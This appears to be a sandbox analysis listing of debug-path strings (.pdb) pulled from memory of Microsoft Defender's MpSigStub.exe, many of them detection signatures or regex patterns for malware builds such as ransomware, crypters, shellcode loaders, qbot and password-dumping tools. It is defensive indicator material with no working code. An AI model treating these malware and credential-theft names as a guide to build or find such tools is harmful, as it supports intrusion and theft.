Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.6340275863.0000028BD67EC000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
Source:	Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
Source:	Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp
Source:	Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
Source:	Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
